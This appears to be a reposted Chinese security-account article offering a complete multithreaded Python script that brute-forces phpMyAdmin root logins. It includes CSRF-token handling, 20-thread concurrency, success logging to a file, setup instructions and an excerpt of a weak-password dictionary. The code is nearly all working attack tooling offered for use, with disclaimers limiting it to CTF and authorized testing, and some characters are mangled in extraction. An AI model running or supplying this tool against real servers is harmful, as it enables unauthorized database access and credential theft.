工具介绍
phpmyadmin 弱口令探测多线程phpMyAdmin登录爆破脚本,适用于CTF及授权渗透测试场景。
功能特性
-
多线程并发请求(默认20线程) -
自动处理登录Token验证 -
实时尝试计数器 -
终端彩色状态输出 -
成功结果自动记录至success.txt -
支持用户中断操作
使用说明
-
修改脚本头部参数:
target = 'http://target_url/phpmyadmin/' # 目标地址 user = 'root' # 目标账户 passdic = 'path/to/password_list.txt' # 密码字典路径
-
执行脚本:
python phpmyadmin密码爆破.py
-
观察输出:
-
成功密码显示为绿色 -
错误信息显示为黄色 -
最终结果保存至当前目录的success.txt
phpmyadmin密码爆破.py
from requests import Session from re import findall from html import unescape from concurrent.futures import ThreadPoolExecutor from threading import Event, Lock import sys # 目标地址(根据实际情况修改) target = 'http://192.168.43.110/phpmyAdmin/index.php' # 要爆破的用户名 user = 'root' # 密码字典文件路径 passdic = r"./密码top500.txt" class OutputManager: """线程安全的输出管理类""" def __init__(self): self.lock = Lock() # 线程锁 self.counter = 0 # 计数器(记录尝试次数) def success(self, target, user, password): """成功发现密码时的输出""" with self.lock: self.counter += 1 print(f"n�33[32m[+] 成功找到密码!用户: {user} 密码: {password} (总尝试次数: {self.counter})�33[0m") self._write_to_file(target, user, password) def fail(self, target, user): """爆破失败时的输出""" with self.lock: print(f"�33[31m[-] 未找到密码!用户: {user} (总尝试次数: {self.counter})�33[0m") def error(self, target, user, password, error): """错误信息输出""" with self.lock: self.counter += 1 print(f"�33[33m[!] 尝试密码 '{password}' 时出错: {error}�33[0m") def info(self, message): """普通信息输出""" with self.lock: self.counter += 1 print(f"[*] 正在尝试: {message}") def warning(self, message): """警告信息输出""" with self.lock: print(f"�33[33m[!] {message}�33[0m") def _write_to_file(self, target, user, password): """写入文件操作(内部方法)""" try: with open('success.txt', 'a') as f: f.write(f'{target} | {user} | {password}n') except Exception as e: self.error(target, user, password, f"文件写入失败: {e}") class BruteForcer: """密码爆破主类""" def __init__(self, target, user): self.success_event = Event() # 成功事件标志 self.title_fail = None # 登录失败页面标题 self.output = OutputManager() # 输出管理器实例 self.target = target # 目标URL self.user = user # 目标用户名 # 请求头配置 self.headers = { 'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) ' 'AppleWebKit/537.36 (KHTML, like Gecko) ' 'Chrome/87.0.4280.88 Safari/537.36' } def get_token(self, text) -> str: """从页面中提取 Token""" token = findall(r"name="token" value="(.*?)" />", text) return unescape(token[0]) if token else None def get_title(self, text) -> str: """获取页面标题用于验证""" title = findall('<title>(.*)</title>', text) return title[0] if title else None def initialize(self): """初始化获取失败页面标题""" with Session() as s: s.headers.update(self.headers) try: response = s.get(self.target, timeout=5) self.title_fail = self.get_title(response.text) self.output.info(f"初始化成功,失败页面标题: {self.title_fail}") except Exception as e: self.output.error(self.target, self.user, "", f"初始化失败: {e}") sys.exit(1) def try_password(self, password): """单密码尝试逻辑""" if self.success_event.is_set(): return False # 输出中间信息(带计数器) self.output.info(f"用户: {self.user} 密码: {password}") with Session() as s: s.headers.update(self.headers) try: # 获取最新 Token get_resp = s.get(self.target, timeout=5) if get_resp.status_code != 200: self.output.error(self.target, self.user, password, f"HTTP {get_resp.status_code}") return False token = self.get_token(get_resp.text) if not token: self.output.error(self.target, self.user, password, "Token 获取失败") return False # 构造登录请求 data = { 'pma_username': self.user, 'pma_password': password, 'server': 1, 'target': 'index.php', 'token': token } post_resp = s.post(self.target, data=data, timeout=5) current_title = self.get_title(post_resp.text) if current_title != self.title_fail: self.output.success(self.target, self.user, password) self.success_event.set() return True return False except Exception as e: self.output.error(self.target, self.user, password, str(e)) return False def run_bruteforce(self): """启动爆破流程""" self.initialize() # 读取密码字典 try: with open(passdic, 'r', encoding='utf-8') as f: passwords = [line.strip() for line in f if line.strip()] except FileNotFoundError: self.output.error(self.target, self.user, "", "密码字典文件不存在") sys.exit(1) self.output.info(f"已加载 {len(passwords)} 个密码,开始爆破...") with ThreadPoolExecutor(max_workers=20) as executor: futures = [] try: # 提交所有任务 forpwdin passwords: if self.success_event.is_set(): break futures.append(executor.submit(self.try_password, pwd)) # 等待任务完成 for future in futures: if self.success_event.is_set(): break future.result() except KeyboardInterrupt: self.output.warning("用户中断操作,正在清理线程...") self.success_event.set() executor.shutdown(wait=False) finally: if not self.success_event.is_set(): self.output.fail(self.target, self.user) if __name__ == "__main__": try: bf = BruteForcer(target, user) bf.run_bruteforce() except KeyboardInterrupt: print("n�33[33m[!] 用户主动终止程序�33[0m") except Exception as e: print(f"�33[31m[CRITICAL] 未捕获异常: {e}�33[0m")
密码top500.txt
123456 password 12345678 qwerty 123456789 12345 1234 111111 1234567 dragon 123123 baseball abc123 football monkey 88888888 ......
注意事项
-
密码字典建议使用Top 100/500等常用弱口令集合 -
线程数根据网络环境调整 -
仅限合法授权测试场景使用 -
使用者需自行承担相关法律责任
工具获取
原文始发于微信公众号(夜组安全):phpmyadmin 弱口令探测工具
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论